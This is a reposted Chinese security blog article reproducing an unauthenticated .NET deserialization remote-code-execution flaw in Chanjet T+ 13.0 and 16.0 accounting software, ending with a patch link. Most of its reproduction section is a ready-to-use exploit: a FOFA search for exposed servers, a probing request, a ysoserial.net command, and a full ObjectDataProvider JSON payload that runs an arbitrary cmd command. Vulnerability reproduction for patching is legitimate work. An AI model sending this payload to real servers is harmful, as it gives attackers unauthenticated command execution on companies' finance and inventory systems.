本文仅用于技术讨论与学习，利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者及本公众号不为此承担任何责任。

0x01 产品简介

畅捷通 T+ 是一款基于互联网的新型企业管理软件，功能模块包括：财务管理、采购管理、库存管理等。主要针对中小型工贸和商贸企业的财务业务一体化应用，融入了社交化、移动化、物联网、电子商务、互联网信息订阅等元素。

0x02 漏洞概述

畅捷通 T+ 存在.net反序列化漏洞，未经过身份认证的攻击者可以通过构造恶意的序列化请求在目标服务器上执行任意命令。

0x03 影响范围

畅捷通 T+ 13.0

畅捷通 T+ 16.0

0x04 复现环境

FOFA：app="畅捷通-TPlus"

0x05 漏洞复现

该漏洞属于.net反序列化场景中的 JavaScriptSerializer反序列化；

简介：在.NET处理 Ajax应用的时候，通常序列化功能由JavaSerializer类提供，它是.NET2.0之后内部实现的序列化功能的类，位于命名空间System.Web..Serialization、通过System.Web.Extensions引用，让开发者轻松实现.Net中所有类型和Json数据之间的转换，但在某些场景下开发者使用Deserialize 或DeserializeObject方法处理不安全的Json数据时会造成反序列化攻击从而实现远程RCE漏洞。

PoC

POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: your-ip
X-Ajaxpro-Method: GetStoreWarehouseByStore

{
"storeID":{}
}

PS:X-Ajaxpro-Method：用于指定在Ajax请求中要调用的服务器端方法的名称

出现这种情况，则存在漏洞

使用ysoserial.net工具构造payload（攻击链：ObjectDataProvider）

./ysoserial.exe -f JavaScriptSerializer -g ObjectDataProvider -c "执行的命令"

将生成的序列化数据加载到PoC中（PS：需要将里面的单引号替换成双引号）

exp：

POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: your-ip
X-Ajaxpro-Method: GetStoreWarehouseByStore

{
"storeID":{
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
"MethodName":"Start",
"ObjectInstance":{
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
"StartInfo": {
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
"FileName":"cmd", "Arguments":"/c 执行的命令"
}
}
}
}

0x06 修复建议

目前官方已发布补丁更新，建议受影响用户尽快安装。

T+ 16.000.000.0283 及以上补丁包：

https://www.chanjetvip.com/product/goods/detail?id=6077e91b70fa071069139f62

本文转自https://blog.csdn.net/qq_41904294/article/details/131350965?spm=1001.2014.3001.5502，作者:OidBoy_G如有侵权，请联系删除。